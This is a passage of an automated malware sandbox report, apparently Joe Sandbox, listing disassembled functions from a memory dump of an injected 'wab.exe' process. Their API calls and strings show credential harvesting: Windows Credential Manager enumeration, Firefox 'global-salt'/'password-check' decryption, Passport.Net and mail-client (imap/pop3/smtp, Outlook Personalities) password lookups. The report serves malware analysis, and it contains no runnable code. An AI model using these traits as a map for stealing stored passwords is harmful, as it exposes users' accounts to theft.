                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                                                          • API String ID: 1886237854-2881260426
                                                                                                                                                                                                                          • Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                                          • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00441F4B
                                                                                                                                                                                                                            • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmpmemcpy
                                                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                          • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                          • Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                                                          • Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FBBB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FBCD
                                                                                                                                                                                                                            • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FCB4
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FCD9
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3974772901-0
                                                                                                                                                                                                                          • Opcode ID: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                                                          • Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                                            • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                                                                                                                                                                                                            • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 577244452-0
                                                                                                                                                                                                                          • Opcode ID: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                                                          • Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004044FA
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                          • String ID: imap$pop3$smtp
                                                                                                                                                                                                                          • API String ID: 2025310588-821077329
                                                                                                                                                                                                                          • Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                                          • Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD88
                                                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                            • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                                                                                            • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                                                                                            • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                                                                                            • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                                                                                            • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                                                                                            • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                                                                                            • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                          • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                          • Opcode ID: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                                          • Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A78
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A91
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1786725549-0
                                                                                                                                                                                                                          • Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                                          • Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00406129
                                                                                                                                                                                                                            • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                                                                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                                                                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00406154
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406199
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                                          • String ID: global-salt$password-check
                                                                                                                                                                                                                          • API String ID: 231171946-3927197501
                                                                                                                                                                                                                          • Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                                          • Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                                                          • Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004016A2
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 004016D6
                                                                                                                                                                                                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                                                          • Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                                          • Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                                                                          • String ID: XgD$rY@
                                                                                                                                                                                                                          • API String ID: 3502187192-1347721759
                                                                                                                                                                                                                          • Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                                          • Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406376
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                                                            • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                          • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                                          • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset$strlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2142929671-0
                                                                                                                                                                                                                          • Opcode ID: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                                          • Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F133
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                          • String ID: Passport.Net\*
                                                                                                                                                                                                                          • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                          • Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                                          • Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004032FD
                                                                                                                                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040334C
                                                                                                                                                                                                                            • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040338E
                                                                                                                                                                                                                            • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                          • String ID: Personalities
                                                                                                                                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                          • Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                                          • Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                                          Strings
